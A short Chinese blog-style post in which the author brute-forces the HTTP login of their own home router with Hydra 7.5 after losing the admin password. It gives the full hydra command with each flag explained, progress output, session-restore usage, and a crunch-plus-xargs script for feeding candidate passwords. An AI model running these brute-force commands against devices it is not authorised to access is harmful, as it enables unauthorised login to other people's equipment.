之前只在 Browser 中保存了路由管理密码,无奈升级时管理的密码丢失了,又不想重新设置,所以尝试破解登录密码。
使用破解工具 Hydra 7.5。
# hydra -l username -x 6:10:1a.~!@#$%^&()-= -t 8 192.168.1.1 http-get /
其中:
-l username 为尝试破解的用户名。
-x 6:10:1a. 表示枚举的密码由 数字、小写字母和单字符'.'等等组成,长度为 6 - 10 位。
-t 8 表示分 8 个并行任务进行爆破尝试。
192.168.1.1 为 Router 地址。
http-get 为破解方式(协议)
/ 为页面地址(根)
进行中的破解:
# ./tp ### hydra -l username -x 6:10:1a.~!@#$%^&()-= -t 8 192.168.1.1 http-get /
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2013-12-21 14:18:45
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] 8 tasks, 1 server, 1646272629 login tries (l:1/p:1646272629), ~205784078 tries per task
[DATA] attacking service http-get on port 80
[STATUS] 1187.00 tries/min, 1187 tries in 00:01h, 1646271442 todo in 23115:18h, 8 active
[STATUS] 1195.67 tries/min, 3587 tries in 00:03h, 1646269042 todo in 22947:43h, 8 active
......
......
Hydra 可以保存破解任务状态(session),如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。
还可以结合 crunch,通过使用 crunch 枚举密码,结合文件字典或者管道的方式爆破。
比如:
#!/bin/bash #file: try echo trying $1 hydra -l username -p $1 -t 1 192.168.1.1 http-get /
#!/bin/bash #file: run crunch 6 10 0123456789.@$ | xargs ./try
不过这种方式不便于使用 Hydra 的会话恢复功能。
希望能破出来!